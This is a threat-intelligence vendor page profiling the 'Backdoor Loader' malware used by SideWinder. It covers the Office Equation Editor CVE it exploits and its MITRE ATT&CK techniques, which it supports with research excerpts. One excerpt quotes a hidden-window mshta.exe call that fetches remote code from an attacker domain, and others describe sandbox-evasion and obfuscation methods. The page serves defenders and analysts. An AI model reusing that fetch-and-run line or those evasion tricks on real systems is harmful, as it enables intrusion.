Skip to main content
Mallory
Back to malware
MalwareUsed by 1 actorExploits 1 CVE

Backdoor Loader

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVES
CVE-2017-11882Microsoft Office Equation Editor Remote Code ExecutionExploited in the wild

The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.

via securelistsecurelist.com
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
SideWinder

The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named “Backdoor Loader”. This acts as a loader for “StealerBot”, a private post-exploitation toolkit used exclusively by SideWinder.

via securelistsecurelist.com
MITRE ATT&CK

Techniques & procedures

14 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1566PhishingEvidence1

The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker.

T1566.001Spearphishing AttachmentEvidence1

The attacker sends spear-phishing emails with a DOCX file attached.

Execution

3 techniques
T1047Windows Management InstrumentationEvidence1

In the previous version, the malware used a simple WMI query to obtain a list of installed products. The new version uses a different WMI, which collects the name of the antivirus and the related “productState”.

T1059.007JavaScriptEvidence1

The exploit file contained a shellcode... to run embedded JavaScript code invoking the mshtml . RunHTMLApplication function.

T1203Exploitation for Client ExecutionEvidence1

The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process.

Stealth

7 techniques
T1027Obfuscated Files or InformationEvidence1

The remote HTA embeds a heavily obfuscated JavaScript file... strings, initially encoded with a substitution algorithm... embedded within its code as a base64-encoded .NET serialized stream.

T1036MasqueradingEvidence1

Additionally, they change the names and paths of their malicious files... During the most recent campaign, the attackers tried to diversify the samples, generating many other variants distributed under the following names: JetCfg . dll policymanager . dll winmm . dll xmllite . dll dcntel . dll UxTheme . dll

T1218.005MshtaEvidence1

the embedded JavaScript runs the Windows utility mshta . exe and obtains additional code from a remote server

T1497Virtualization/Sandbox EvasionEvidence1

The newer version of the shellcode still uses certain tricks to avoid sandboxes... It uses the GlobalMemoryStatusEx function to determine the size of RAM. It attempts to load the nlssorting . dll library and terminates execution if operation succeeds.

T1497.001System ChecksEvidence1

It uses the GlobalMemoryStatusEx function to determine the size of RAM... The first stage... checks the installed RAM and terminates if the total size is less than 950 MB.

T1564.003Hidden WindowEvidence1

gShZVnyR.Run('mshta.exe https://dgtk.depo-govpk[.]com/19263687/trui',0);

T1620Reflective Code LoadingEvidence1

the second stage decodes and loads the Downloader Module, which is embedded within its code as a base64-encoded .NET serialized stream.

Discovery

3 techniques
T1057Process DiscoveryEvidence1

the malware compares all running process names against an embedded dictionary. The dictionary contains 137 unique process names associated with popular security solutions.

T1497Virtualization/Sandbox EvasionEvidence1

The newer version of the shellcode still uses certain tricks to avoid sandboxes... It uses the GlobalMemoryStatusEx function to determine the size of RAM. It attempts to load the nlssorting . dll library and terminates execution if operation succeeds.

T1497.001System ChecksEvidence1

It uses the GlobalMemoryStatusEx function to determine the size of RAM... The first stage... checks the installed RAM and terminates if the total size is less than 950 MB.

Command and Control

1 technique
T1105Ingress Tool TransferEvidence1

mshta . exe hxxps : //dgtk.depo-govpk[.]com/19263687/trui ... The remote HTA embeds a heavily obfuscated JavaScript file that loads further malware

INDICATORS OF COMPROMISE

IOCs tracked for this family

38 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
36 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
2 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app5 years ago
domain●●●●●●●●●●●●View more in app5 years ago
domain●●●●●●●●●●●●View more in app5 years ago
domain●●●●●●●●●●●●View more in app5 years ago
domain●●●●●●●●●●●●View more in app5 years ago
domain●●●●●●●●●●●●View more in app5 years ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching38

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities1

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping14

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.